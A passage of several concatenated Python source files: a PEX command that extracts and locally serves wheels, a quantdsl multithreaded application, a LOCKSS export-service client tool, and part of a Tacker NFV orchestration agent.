match = re.match(br"^Serving HTTP on [^\s]+ port (?P<port>\d+)[^\d]", data)
real_port.put(int(match.group("port")))
finally:
real_port.task_done()
reader = Thread(target=read_data)
reader.daemon = True
reader.start()
real_port.join()
reader.join()
return cls(cmd=cmd, port=real_port.get(), server_process=http_server_process)
cmd = attr.ib() # type: Iterable[str]
port = attr.ib() # type: int
_server_process = attr.ib() # type: subprocess.Popen
@property
def pid(self):
# type: () -> int
return self._server_process.pid
def join(self):
# type: () -> int
return self._server_process.wait()
def kill(self):
# type: () -> None
self._server_process.kill()
class Repository(JsonMixin, OutputMixin, PEXCommand):
"""Interact with the Python distribution repository contained in a PEX file."""
@classmethod
def _add_info_arguments(cls, subparsers):
# type: (_SubParsersAction) -> ArgumentParser
info_parser = subparsers.add_parser(
name="info", help="Print information about the distributions in a PEX file."
)
info_parser.add_argument(
"-v",
"--verbose",
action="store_true",
help="Print the distributions requirements in addition to its name version and path.",
)
cls.add_json_options(info_parser, entity="verbose output")
cls.register_global_arguments(info_parser, include_verbosity=False)
return info_parser
@classmethod
def _add_extract_arguments(cls, subparsers):
# type: (_SubParsersAction) -> ArgumentParser
extract_parser = subparsers.add_parser(
name="extract", help="Extract all distributions from a PEX file."
)
extract_parser.add_argument(
"-f",
"--dest-dir",
"--find-links",
"--repo",
metavar="PATH",
help="The path to extract distribution as wheels to.",
)
extract_parser.add_argument(
"-D",
"--sources",
action="store_true",
help="Also extract a wheel for the PEX file sources.",
)
extract_parser.add_argument(
"--use-system-time",
dest="use_system_time",
default=False,
action="store_true",
help=(
"Use the current system time to generate timestamps for the extracted "
"distributions. Otherwise, Pex will use midnight on January 1, 1980. By using "
"system time, the extracted distributions will not be reproducible, meaning that "
"if you were to re-run extraction against the same PEX file then the newly "
"extracted distributions would not be byte-for-byte identical distributions "
"extracted in prior runs."
),
)
extract_parser.add_argument(
"--serve",
action="store_true",
help="Serve the --find-links repo.",
)
extract_parser.add_argument(
"--port",
type=int,
default=0,
metavar="PORT",
help="The port to serve the --find-links repo on.",
)
extract_parser.add_argument(
"--pid-file",
metavar="PATH",
help="The path of a file to write the <pid>:<port> of the find links server to.",
)
cls.register_global_arguments(extract_parser)
return extract_parser
@classmethod
def add_arguments(cls, parser):
# type: (ArgumentParser) -> None
cls.add_output_option(parser, entity="distribution information")
parser.set_defaults(repository_func=functools.partial(cls.show_help, parser))
subparsers = parser.add_subparsers(
description=(
"A PEX distribution repository can be operated on using any of the following "
"subcommands."
)
)
cls._add_info_arguments(subparsers).set_defaults(repository_func=cls._info)
cls._add_extract_arguments(subparsers).set_defaults(repository_func=cls._extract)
def run(self, pex):
# type: (PEX) -> Result
repository_func = cast("RepositoryFunc", self.options.repository_func)
return repository_func(self, pex)
@contextmanager
def _distributions_output(self, pex):
# type: (PEX) -> Iterator[Tuple[Iterable[Distribution], IO]]
with self.output(self.options) as out:
yield tuple(pex.resolve()), out
def _info(self, pex):
# type: (PEX) -> Result
with self._distributions_output(pex) as (distributions, output):
for distribution in distributions:
if self.options.verbose:
requires_python = dist_metadata.requires_python(distribution)
requires_dists = list(dist_metadata.requires_dists(distribution))
self.dump_json(
self.options,
dict(
project_name=distribution.project_name,
version=distribution.version,
requires_python=str(requires_python) if requires_python else None,
requires_dists=[str(dist) for dist in requires_dists],
location=distribution.location,
),
output,
)
else:
output.write(
"{project_name} {version} {location}".format(
project_name=distribution.project_name,
version=distribution.version,
location=distribution.location,
)
)
output.write("\n")
return Ok()
def _extract(self, pex):
# type: (PEX) -> Result
if not self.options.serve and not self.options.dest_dir:
return Error("Specify a --find-links directory to extract wheels to.")
dest_dir = (
os.path.abspath(os.path.expanduser(self.options.dest_dir))
if self.options.dest_dir
else safe_mkdtemp()
)
safe_mkdir(dest_dir)
if self.options.sources:
self._extract_sdist(pex, dest_dir)
def spawn_extract(distribution):
# type: (Distribution) -> SpawnedJob[Text]
env = os.environ.copy()
if not self.options.use_system_time:
# N.B.: The `SOURCE_DATE_EPOCH` env var is semi-standard magic for controlling
# build tools. Wheel has supported this since 2016.
# See:
# + https://reproducible-builds.org/docs/source-date-epoch/
# + https://github.com/pypa/wheel/blob/1b879e53fed1f179897ed47e55a68bc51df188db/wheel/archive.py#L36-L39
env.update(SOURCE_DATE_EPOCH=str(int(DETERMINISTIC_DATETIME_TIMESTAMP)))
job = spawn_python_job(
args=["-m", "wheel", "pack", "--dest-dir", dest_dir, distribution.location],
interpreter=pex.interpreter,
expose=["wheel"],
stdout=subprocess.PIPE,
env=env,
)
return SpawnedJob.stdout(
job, result_func=lambda out: "{}: {}".format(distribution, out.decode())
)
with self._distributions_output(pex) as (distributions, output):
errors = []
for result in execute_parallel(distributions, spawn_extract, error_handler=Retain()):
if isinstance(result, tuple):
distribution, error = result
errors.append(distribution)
output.write(
"Failed to build a wheel for {distribution}: {error}\n".format(
distribution=distribution, error=error
)
)
else:
output.write(result)
if errors:
return Error(
"Failed to build wheels for {count} {distributions}.".format(
count=len(errors), distributions=pluralize(errors, "distribution")
)
)
if not self.options.serve:
return Ok()
repo = FindLinksRepo.serve(
interpreter=pex.interpreter, port=self.options.port, directory=dest_dir
)
output.write(
"Serving find-links repo of {pex} via {find_links} at http://localhost:{port}\n".format(
pex=os.path.normpath(pex.path()), find_links=dest_dir, port=repo.port
)
)
if self.options.pid_file:
with safe_open(self.options.pid_file, "w") as fp:
fp.write("{}:{}".format(repo.pid, repo.port))
try:
return Result(exit_code=repo.join(), message=" ".join(repo.cmd))
except KeyboardInterrupt:
repo.kill()
return Ok("Shut down server for find links repo at {}.".format(dest_dir))
@staticmethod
def _extract_sdist(
pex, # type: PEX
dest_dir, # type: str
):
# type: (...) -> None
pex_info = pex.pex_info()
chroot = safe_mkdtemp()
pex_path = pex.path()
src = os.path.join(chroot, "src")
excludes = ["__main__.py", pex_info.PATH, pex_info.bootstrap, pex_info.internal_cache]
shutil.copytree(
PEXEnvironment.mount(pex_path).path, src, ignore=lambda _dir, _names: excludes
)
name, _ = os.path.splitext(os.path.basename(pex_path))
version = "0.0.0+{}".format(pex_info.code_hash)
zip_safe = False # Since PEX files never require code to be zip safe, assume it isn't.
py_modules = [os.path.splitext(f)[0] for f in os.listdir(src) if f.endswith(".py")]
packages = [
os.path.relpath(os.path.join(root, d), src).replace(os.sep, ".")
for root, dirs, _ in os.walk(src)
for d in dirs
]
install_requires = [str(req) for req in pex_info.requirements]
python_requires = None
if len(pex_info.interpreter_constraints) == 1:
python_requires = str(
PythonIdentity.parse_requirement(pex_info.interpreter_constraints[0]).specifier
)
elif pex_info.interpreter_constraints:
logger.warning(
"Omitting `python_requires` for {name} sdist since {pex} has multiple "
"interpreter constraints:\n{interpreter_constraints}".format(
name=name,
pex=os.path.normpath(pex_path),
interpreter_constraints="\n".join(
"{index}.) {constraint}".format(index=index, constraint=constraint)
for index, constraint in enumerate(
pex_info.interpreter_constraints, start=1
)
),
)
)
entry_points = []
if pex_info.entry_point and ":" in pex_info.entry_point:
entry_points = [(name, pex_info.entry_point)]
with open(os.path.join(chroot, "setup.cfg"), "w") as fp:
fp.write(
dedent(
"""\
[metadata]
name = {name}
version = {version}
[options]
zip_safe = {zip_safe}
{py_modules}
{packages}
package_dir =
=src
include_package_data = True
{python_requires}
{install_requires}
[options.entry_points]
{entry_points}
"""
).format(
name=name,
version=version,
zip_safe=zip_safe,
py_modules=(
"py_modules =\n {}".format("\n ".join(py_modules)) if py_modules else ""
),
packages=(
"packages = \n {}".format("\n ".join(packages)) if packages else ""
),
install_requires=(
"install_requires =\n {}".format("\n ".join(install_requires))
if install_requires
else ""
),
python_requires=(
"python_requires = {}".format(python_requires) if python_requires else ""
),
entry_points=(
"console_scripts =\n {}".format(
"\n ".join(
"{} = {}".format(name, entry_point)
for name, entry_point in entry_points
)
)
if entry_points
else ""
),
)
)
with open(os.path.join(chroot, "MANIFEST.in"), "w") as fp:
fp.write("recursive-include src *")
with open(os.path.join(chroot, "setup.py"), "w") as fp:
fp.write("import setuptools; setuptools.setup()")
spawn_python_job(
args=["setup.py", "sdist", "--dist-dir", dest_dir],
interpreter=pex.interpreter,
expose=["setuptools"],
cwd=chroot,
).wait()
|
with_multithreading.py | from threading import Event, Thread
from time import sleep
import six.moves.queue as queue
from quantdsl.application.base import QuantDslApplication
from quantdsl.domain.model.contract_valuation import ContractValuation
from quantdsl.exceptions import TimeoutError, DslCompareArgsError, DslBinOpArgsError, DslIfTestExpressionError
class ServiceExit(Exception):
pass
class QuantDslApplicationWithMultithreading(QuantDslApplication):
def __init__(self, num_threads=4, *args, **kwargs):
super(QuantDslApplicationWithMultithreading, self).__init__(call_evaluation_queue=queue.Queue(),
*args, **kwargs)
self.num_threads = num_threads
self.has_thread_errored = Event()
self.thread_exception = None
self.threads = []
# Start evaluation worker threads.
for _ in range(self.num_threads):
t = Thread(target=self.protected_loop_on_evaluation_queue)
t.setDaemon(True)
t.daemon = True
t.start()
self.threads.append(t)
def protected_loop_on_evaluation_queue(self):
try:
self.loop_on_evaluation_queue()
except Exception as e:
if not self.has_thread_errored.is_set():
self.thread_exception = e
self.has_thread_errored.set()
if not isinstance(e, (TimeoutError, DslCompareArgsError, DslBinOpArgsError, DslIfTestExpressionError)):
raise
def get_result(self, contract_valuation):
assert isinstance(contract_valuation, ContractValuation)
# Todo: Subscribe to call result, with handler that sets an event. Then wait for the
# event with a timeout, in a while True loop, checking for interruptions and timeouts
# like in Calculate.calculate().
while True:
try:
return super(QuantDslApplicationWithMultithreading, self).get_result(contract_valuation)
except KeyError:
sleep(0.1)
self.check_has_thread_errored()
def check_has_thread_errored(self):
if self.has_thread_errored.is_set():
raise self.thread_exception
|
exportservice.py | #!/usr/bin/env python3
'''A library and a command line tool to interact with the LOCKSS daemon export
service via its Web Services API.'''
__copyright__ = '''\
Copyright (c) 2000-2021, Board of Trustees of Leland Stanford Jr. University,
all rights reserved.
'''
__license__ = '''\
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
__version__ = '0.1'
_service = 'ExportService'
import sys
try: import zeep
except ImportError: sys.exit('The Python Zeep module must be installed (or on the PYTHONPATH)')
import argparse
import getpass
import itertools
from multiprocessing.dummy import Pool as ThreadPool
import os.path
from threading import Thread
import zeep.exceptions
import zeep.helpers
from wsutil import file_lines, make_client, enable_zeep_debugging, host_help_prefix
#
# Library
#
def create_export_files(host, username, password, auid, options):
'''Performs a createExportFiles operation on the given host for the given AUID, and
returns a record with the files.
Parameters:
:param host: a host:port pair (string)
:param username: a username for the host (string)
:param password: a password for the host (string)
:param auid: an auid to hash (string)
Returns:
- ret (dict):
{
'auId': '<auid>',
'dataHandlerWrappers': [
{
'dataHandler' (base64Binary): zipped AU
'name' (string): '<prefix>-<timestamp>-<5 digit id>.zip',
'size' (long): size of dataHandler in bytes
}
]
}
'''
req = {
'auid': auid,
'compress': options.compress,
'excludeDirNodes': options.exclude_dir,
'filePrefix': options.output_prefix,
'fileType': options.file_type,
'maxSize': options.max_size,
'maxVersions': options.max_vers,
'xlateFilenames': options.translate
}
client = make_client(host, username, password, _service)
try:
ret = client.service.createExportFiles(req)
return zeep.helpers.serialize_object(ret)
except zeep.exceptions.Fault as e:
if e.message == 'No Archival Unit with provided identifier':
return None
else:
raise
#
# Command line tool
#
class _ExportServiceOptions(object):
@staticmethod
def make_parser():
usage = '%(prog)s {--host=HOST|--hosts=HFILE}... [OPTIONS]'
parser = argparse.ArgumentParser(description=__doc__, usage=usage)
parser.add_argument('--version', '-V', action='version', version=__version__)
# Hosts
group = parser.add_argument_group('Target hosts')
group.add_argument('--host', action='append', default=list(),
help=host_help_prefix + ' to list of target hosts')
group.add_argument('--hosts', action='append', default=list(), metavar='HFILE',
help=host_help_prefix + ' in HFILE to list of target hosts')
group.add_argument('--password', metavar='PASS', help='UI password (default: interactive prompt)')
group.add_argument('--username', metavar='USER', help='UI username (default: interactive prompt)')
# AUIDs
group = parser.add_argument_group('Target AUIDs')
group.add_argument('--auid', action='append', default=list(), help='add AUID to list of target AUIDs')
group.add_argument('--auids', action='append', default=list(), metavar='AFILE',
help='add AUIDs in AFILE to list of target AUIDs')
# AUID operations
group = parser.add_argument_group('AU operations')
# this seems to be redundant. leaving in in case some future functionality does make this an optional flag
group.add_argument('--create-export-files', action='store_true', required=True,
help='output export files of target AUIDs')
# Output
group = parser.add_argument_group('Output')
group.add_argument('--output-directory', metavar='OUTDIR', default='.',
help='output directory (default: current directory)')
group.add_argument('--output-prefix', metavar='PREFIX', default='exportservice',
help='prefix for output file names (default: %(default)s)')
group.add_argument('--compress', action='store_false',
help='compress the export files (default: True).')
group.add_argument('--exclude-dir', action='store_false',
help='exclude directory nodes from the export files (default: True).')
group.add_argument('--file-type', default="ZIP", choices=['ZIP'],
help='file type of the exported AU. (default: %(default)s)')
group.add_argument('--max-size', default=1000, type=int, help=' (default: %(default)d)')
group.add_argument('--max-vers', default=-1, type=int, help=' (default: %(default)d)')
group.add_argument('--translate', default=None, choices=[None],
help='translate export file filenames. (default: %(default)s)')
# Other options
group = parser.add_argument_group('Other options')
group.add_argument('--group-by-field', action='store_true', default=False,
help='group results by field instead of host')
group.add_argument('--threads', type=int, help='max parallel jobs allowed (default: no limit)')
group.add_argument('--debug-zeep', action='store_true', help='adds zeep debugging logging')
return parser
def __init__(self, parser, args):
'''
Constructor.
Parameters:
- parser (OptionParser instance): the option parser
- args (list of strings): the remaining command line arguments returned by
the parser
'''
super(_ExportServiceOptions, self).__init__()
if len(args.auid) + len(args.auids) > 0 and not any([args.create_export_files]):
parser.error('--auid, --auids can only be applied to --create-export-files')
# hosts
self.hosts = args.host[:]
for f in args.hosts: self.hosts.extend(file_lines(f))
if len(self.hosts) == 0: parser.error('at least one target host is required')
# auids
self.auids = args.auid[:]
for f in args.auids: self.auids.extend(file_lines(f))
# get_auids/get_auids_names/is_daemon_ready/is_daemon_ready_quiet
if len(self.auids) == 0: parser.error('at least one target AUID is required')
# create_export_files
self.create_export_files = args.create_export_files
if self.create_export_files:
if len(self.auids) == 0: parser.error('at least one target AUID is required with --create-export-files')
# threads
self.threads = args.threads or len(self.hosts)
# output_directory/output_prefix
self.output_directory = os.path.expanduser(args.output_directory)
if not os.path.isdir(self.output_directory):
parser.error('no such directory: %s' % (self.output_directory,))
if args.output_prefix is None: parser.error('--output-prefix is required')
if '/' in args.output_prefix: parser.error('output prefix cannot contain a slash')
self.output_prefix = args.output_prefix
# sorting options
self.group_by_field = args.group_by_field
# operation options
self.compress = args.compress
self.exclude_dir = args.exclude_dir
self.file_type = args.file_type
self.max_size = args.max_size
self.max_vers = args.max_vers
self.translate = args.translate
# add logging for zeep
if args.debug_zeep:
enable_zeep_debugging()
# auth
self._u = args.username or getpass.getpass('UI username: ')
self._p = args.password or getpass.getpass('UI password: ')
# Last modified 2018-03-19 for unicode support and boolean False when boolean is None
def _output_record(options, lst):
print('\t'.join([str(x or '') for x in lst]))
#print('\t'.join([x.encode('utf-8') if type(x) is str else str(x or False) if type(x)==type(True) else str(x or '') for x in lst]))
# Last modified 2021-05-28
def _output_table(options, data, rowheaders, lstcolkeys, rowsort=None):
'''Internal method to display tabular output. (Should be refactored.)'''
colkeys = [x for x in itertools.product(*lstcolkeys)]
for j in range(len(lstcolkeys)):
if j < len(lstcolkeys) - 1: rowpart = [''] * len(rowheaders)
else: rowpart = rowheaders
_output_record(options, rowpart + [x[j] for x in colkeys])
for rowkey in sorted(set([k[0] for k in data]), key=rowsort):
_output_record(options, list(rowkey) + [data.get((rowkey, colkey)) for colkey in colkeys])
_AU_STATUS = {
'name': ('File name', lambda r: r.get('name')),
'size': ('Size', lambda r: r.get('size')),
}
def _do_create_export_files(options):
headlamb = [_AU_STATUS[x] for x in _AU_STATUS]
data = dict()
for host, auid, result in ThreadPool(options.threads).imap_unordered( \
lambda _tup: (_tup[1], _tup[0],
create_export_files(_tup[1], options._u, options._p, _tup[0], options)), \
itertools.product(options.auids, options.hosts)):
if result is not None:
if result['dataHandlerWrappers'] is not None:
source = result['dataHandlerWrappers'][0]['dataHandler']
fstr = result['dataHandlerWrappers'][0]['name']
if source is not None:
with open(os.path.join(options.output_directory, fstr), 'wb') as f:
f.write(source)
for head, lamb in headlamb:
if options.group_by_field: colkey = (head, host)
else: colkey = (host, head)
data[((auid,), colkey)] = lamb(result['dataHandlerWrappers'][0])
_output_table(options, data, ['AUID'], [[x[0] for x in headlamb],
sorted(options.hosts)] if options.group_by_field else [sorted(options.hosts), [x[0] for x in headlamb]])
else:
print('File not found, unknown error encountered.')
def _dispatch(options):
if options.create_export_files: _do_create_export_files(options)
else: raise RuntimeError('Unreachable')
def _main():
'''Main method.'''
# Parse command line
parser = _ExportServiceOptions.make_parser()
args = parser.parse_args()
options = _ExportServiceOptions(parser, args)
# Dispatch
t = Thread(target=_dispatch, args=(options,))
t.daemon = True
t.start()
while True:
t.join(1.5)
if not t.is_alive(): break
if __name__ == '__main__': _main()
|
tacker_agent.py | #!/usr/bin/env python
import json
import time
import yaml
import logging
from queue import Queue
from threading import Thread
from multiprocessing.pool import Pool
from exceptions import NFVOAgentsException, NFVOAgentOptions, VIMAgentsException
from nfvo_agents import NFVOAgents
from interface import implements
from openstack_agent import OpenStackAgent
from utils import OK, ERROR, ACTIVE, TIMEOUT, TACKER_NFVO, INTERNAL, EXTERNAL
from tacker import Tacker
# The package fake_tacker should be used for performance testing or demo purposes. It takes out Tacker NFVO requests
# Also see in the beginning of the "create_vnf" function in "Core" class.
# from fake_tacker import IdentityManager, Tacker
REACHABLE = "REACHABLE"
logger = logging.getLogger('tacker_agent')
class TackerAgent(implements(NFVOAgents)):
"""Implementation of the Tacker Agent."""
def __init__(self, auth_url, username, password, tenant_name, vim_name, vim_username, vim_password,
domain_id, domain_name, nfvo_id, nfvo_name):
self.vim_name = vim_name
self._vim_username = vim_username
self._vim_password = vim_password
self.nfvo_name = nfvo_name
self.domain_name = domain_name
self.domain_id = domain_id
self.nfvo_id = nfvo_id
self.tacker = Tacker(auth_url, username, password, tenant_name)
self.vim_id = self._get_vim_id()
def _get_vim_id(self):
vims = self.tacker.vim_list()
for vim in vims:
if vim['name'] == self.vim_name:
return vim['id']
msg = "VIM '%s' not found in '%s' platform!" % (self.vim_name, self.nfvo_name)
logger.critical(msg)
exit(1)
def get_vim_agent_instance(self):
"""Instantiates a VIM Agent
Raises
------
NFVOAgentsException
"""
vim_data = self.tacker.vim_show(self.vim_id)
if vim_data['type'] != 'openstack':
msg = "VIM type %s not supported." % vim_data['type']
logger.error(msg)
raise NFVOAgentsException(ERROR, msg)
vim_agent = OpenStackAgent(vim_data['auth_url'],
self._vim_username,
self._vim_password,
vim_data['vim_project']['name'],
self.vim_name
)
return vim_agent
@staticmethod
def vnfd_json_yaml_parser(vnfd):
"""Parses and returns a vnfd
Raises
------
NFVOAgentsException
"""
try:
vnfd = json.loads(vnfd)
except ValueError:
try:
raw_vnfd = yaml.full_load(vnfd)
try:
attr_vnfd = dict()
attr_vnfd['tosca_definitions_version'] = raw_vnfd['tosca_definitions_version']
attr_vnfd['metadata'] = raw_vnfd['metadata']
attr_vnfd['description'] = raw_vnfd['description']
attr_vnfd['topology_template'] = raw_vnfd['topology_template']
attributes = {'vnfd': attr_vnfd}
head = dict()
head['description'] = raw_vnfd['description']
head['service_types'] = [{'service_type': 'vnfd'}]
head['attributes'] = attributes
vnfd = dict()
vnfd['vnfd'] = head
except KeyError as e:
msg = "YAML error format: %s" % e
logger.error(msg)
raise NFVOAgentsException(ERROR, msg)
except yaml.YAMLError:
msg = "VNFD should be in JSON or YAML format!"
logger.error(msg)
raise NFVOAgentsException(ERROR, msg)
vnfd['vnfd']['name'] = vnfd['vnfd']['attributes']['vnfd']['metadata']['template_name']
return vnfd
def create_vnfd(self, vnfd):
"""Create a VNF descriptor and return its ID.
:param vnfd: VNFD content
:return: vnfd_id
Raises
------
NFVOAgentsException
"""
try:
response = self.tacker.vnfd_create(vnfd)
except NFVOAgentsException as e:
error_reason = 'VNF descriptor could not be created: %s' % e.reason
logger.error(error_reason)
raise NFVOAgentsException(ERROR, error_reason)
return response['id']
def delete_vnfd(self, vnfd_id):
"""Deletes a VNF descriptor in NFVO
:param vnfd_id: VNFD ID in the Tacker
ReRaises
------
NFVOAgentsException
"""
vnfs = self.tacker.vnf_list()
vnfds = []
for vnf in vnfs:
vnfds.append(vnf['vnfd_id'])
if vnfd_id not in vnfds:
try:
self.tacker.vnfd_delete(vnfd_id)
except NFVOAgentsException as e:
error_msg = 'Unable to delete VNFD id %s: %s' % (vnfd_id, e.reason)
logger.error(error_msg)
raise NFVOAgentsException(ERROR, error_msg)
def create_vnf_vm(self, vnfd_id, vnf_name):
"""Create a VNF VM and return its ID.
Raises
------
NFVOAgentsException
"""
vim = self.tacker.vim_show(self.vim_id)
if not vim:
raise NFVOAgentsException(ERROR, "VIM name '%s' not found in '%s'!" % (self.vim_name, self.nfvo_name))
vim_status = vim['status']
# TODO remove the checking of PENDING status below
"""
PENDING was added here as a work-around since mistral-lib version 2.2.0 from pip on kolla-ansible
installation does not change the status of the Vim to REACHABLE
"""
if vim_status not in (REACHABLE, 'PENDING'):
raise NFVOAgentsException(ERROR, "VIM status of '%s' is '%s' in '%s' platform!"
% (self.vim_name, vim_status, self.nfvo_name))
try:
vnf = self.tacker.vnf_create(vnfd_id, vnf_name, self.vim_id)
except NFVOAgentsException as e:
error_reason = 'VNF could not be created. status_code: %d, reason: %s' % (e.status, e.reason)
logger.error(error_reason)
raise NFVOAgentsException(ERROR, error_reason)
return vnf['id']
def polling(self, vnf_id):
"""Constantly checks the creation status of the VNF.
Wait until the VNF status is set to ACTIVE on Tacker.
:return: VNF IP address
Raises
------
NFVOAgentsException
"""
# IMPORTANT: This is not related to Click VNF Functions. Do not confuse it!
timeout = 300
sleep_interval = 2
while timeout > 0:
vnf = self.tacker.vnf_show(vnf_id)
vnf_status = vnf['status']
if vnf_status == ACTIVE:
vnf_ip = json.loads(vnf['mgmt_ip_address'])['VDU1']
return vnf_ip
elif vnf_status == ERROR:
error_reason = vnf['error_reason']
raise NFVOAgentsException(ERROR, error_reason)
else:
time.sleep(sleep_interval)
timeout -= sleep_interval
if timeout <= 0:
error_reason = 'TIMEOUT'
raise NFVOAgentsException(TIMEOUT, error_reason)
def create_vnf(self, vnfp_dir, vnfd_name, vnf_name):
"""Create a VNF and initialize all tasks.
:param vnfp_dir: directory path containing the VNF Package
:param vnfd_name: a name
:param vnf_name: a name
:return: some VNF instance data
Raises
------
NFVOAgentsException
"""
vnfd_path = '%s/vnfd.json' % vnfp_dir
with open(vnfd_path) as vnfd_file:
vnfd_data = vnfd_file.read()
vnfd_data = json.loads(vnfd_data)
vnfd_data['vnfd']['name'] = vnfd_name
vnfds = self.tacker.vnfd_list()
vnfd_id = None
# Verify if the VNFD name already exists in NFVO
for vnfd in vnfds:
if vnfd['name'] == vnfd_data['vnfd']['name']:
vnfd_id = vnfd['id']
break
if not vnfd_id:
vnfd_id = self.create_vnfd(json.dumps(vnfd_data))
logger.info('VNF descriptor created with id %s', vnfd_id)
else:
logger.info('Using an existing VNF descriptor id %s!', vnfd_id)
# Generating a unique VNF name to avoid Tacker Internal Server Error
vnfs = self.tacker.vnf_list()
seq = 1
vnf_name = ''.join([vnf_name, '-', str(seq)])
while True:
vnf_list = [vnf for vnf in vnfs if vnf['name'] == vnf_name]
if len(vnf_list) > 0:
seq += 1
vnf_name = vnf_name[:-1] + str(seq)
continue
break
# Unique VNF name up to here
try:
vnf_id = self.create_vnf_vm(vnfd_id, vnf_name)
# Rollback VNFD creation
except NFVOAgentsException as e:
try:
self.delete_vnfd(vnfd_id)
logger.info("VNF descriptor id %s removed.", vnfd_id)
# in case of error on deleting VNFD
except NFVOAgentsException as ex:
logger.error(ex.reason)
e.reason = ' '.join([e.reason, ex.reason])
raise NFVOAgentsException(e.status, e.reason)
logger.info('VNF is being created with id %s', vnf_id)
# Wait until VM is fully created
try:
vnf_ip = self.polling(vnf_id)
# in case of polling exception
except NFVOAgentsException as e:
error_reason = 'VNF could not be created: %s' % e.reason
logger.error(error_reason)
raise NFVOAgentsException(e.status, error_reason)
return {
'vnfd_id': vnfd_id,
'vnf_id': vnf_id,
'vnf_ip': vnf_ip
}
def destroy_vnf(self, vnf_id):
"""Destroys a VNF and deletes its VNFD
:param vnf_id: VNF ID in the Tacker
Raises
------
NFVOAgentsException
"""
vnffgs = self.tacker.vnffg_list()
vnfs = []
for vnffg in vnffgs:
for vnf in vnffg['vnf_mapping'].values():
vnfs.append(vnf)
if vnf_id in vnfs:
message = "A VNFFG depends on this VNF!"
logger.warning(message)
raise NFVOAgentsException(ERROR, message)
vnfd_id = self.tacker.vnf_show(vnf_id)['vnfd_id']
try:
self.tacker.vnf_delete(vnf_id)
except NFVOAgentsException as e:
error_reason = 'Unable to remove VNF. status_code: %d, reason: %s' % (e.status, e.reason)
logger.error(error_reason)
raise NFVOAgentsException(ERROR, error_reason)
# polling waiting to remove successfully this VNF
timeout = 300
sleep_interval = 2
while timeout > 0:
timeout -= sleep_interval
time.sleep(sleep_interval)
try:
vnf = self.tacker.vnf_show(vnf_id)
except NFVOAgentsException as e:
if e.status == 404: # error 404 means not found, i.e. VNF has been deleted
break
else:
error_reason = 'Unable to get VNF %s. %s' % (vnfd_id, e.reason)
logger.error(error_reason)
raise NFVOAgentsException(ERROR, error_reason)
if vnf and vnf['status'] != 'PENDING_DELETE':
error_reason = "VNF in %s status!" % vnf['status']
logger.error(error_reason)
raise NFVOAgentsException(ERROR, error_reason)
self.delete_vnfd(vnfd_id)
def list_vnfs(self):
""" List all Tacker VNFs
:return: a list of dict containing all Tacker VNFs
Raises
------
NFVOAgentsException
"""
response = self.tacker.vnf_list()
vnfs = []
for vnf in response:
vnf_id = vnf['id']
vnf_name = vnf['name']
try:
mgmt_url = json.loads(vnf['mgmt_ip_address'])['VDU1']
except TypeError:
mgmt_url = ''
try:
instance = vnf['attributes']['heat_template']
instance = yaml.full_load(instance)
instance_name = instance['resources']['VDU1']['properties']['name']
except KeyError:
instance_name = ''
vnfd_id = vnf['vnfd_id']
vnf_status = vnf['status']
if vnf['vim_id'] == self.vim_id:
vnfs.append({
'vnf_id': vnf_id,
'vnf_name': vnf_name,
'instance_name': instance_name,
'mgmt_url': mgmt_url,
'vnfd_id': vnfd_id,
'vnf_status': vnf_status,
'platform': TACKER_NFVO,
'domain_name': self.domain_name,
'nfvo_name': self.nfvo_name,
'vim_name': self.vim_name
})
return vnfs
def show_vnf(self, vnf_id):
"""Get information about a given VNF from Tacker
:param vnf_id: the ID from a given VNF in Tacker
:return: a dict with a few information about a given VNF
Raises
------
NFVOAgentsException
"""
vnf = {}
response = self.tacker.vnf_show(vnf_id)
if response:
# for k, v in iter(response.items()):
# if k in ('id', 'name', 'status', 'vnfd_id', 'error_reason', 'description', 'instance_id'):
# vnf[k] = v
mgmt_url = json.loads(response['mgmt_ip_address'])['VDU1']
instance = response['attributes']['heat_template']
instance = yaml.full_load(instance)
instance_name = instance['resources']['VDU1']['properties']['name']
vnf['id'] = response['id']
vnf['name'] = response['name']
vnf['status'] = response['status']
vnf['error_reason'] = response['error_reason']
vnf['vnfd_id'] = response['vnfd_id']
vnf['mgmt_address'] = mgmt_url
vnf['vm_name'] = instance_name
return vnf
def list_vnf_nfvo_resources(self, vnf_id):
"""List resources such as VDU and CP.
ReRaises
------
NFVOAgentsException
"""
resources = self.tacker.vnf_resources(vnf_id)
return resources
def create_vnffgd(self, vnffgd):
"""Create VNF Forwarding Graph Descriptor in Tacker.
:return: Tacker's VNFFGD ID
Raises
------
NFVOAgentsException
"""
try:
response = self.tacker.vnffgd_create(vnffgd)
except NFVOAgentsException as e:
error_reason = 'VNFFG descriptor could not be created: %s' % e.reason
logger.error(error_reason)
raise NFVOAgentsException(ERROR, error_reason)
return response['id']
def list_vnffgds(self):
"""Retrieves the list of VNFFGDs from Tacker
ReRaises
------
NFVOAgentsException
"""
vnffgds = self.tacker.vnffgd_list()
return vnffgds
def delete_vnffgd(self, vnffgd_id):
"""Delete a given VNFFGD in Tacker
Raises
------
NFVOAgentsException
"""
try:
self.tacker.vnffgd_delete(vnffgd_id)
except NFVOAgentsException as e:
error_msg = 'Unable to delete VNFFGD id %s: %s' % (vnffgd_id, e.reason)
logger.error(error_msg)
raise NFVOAgentsException(ERROR, error_msg)
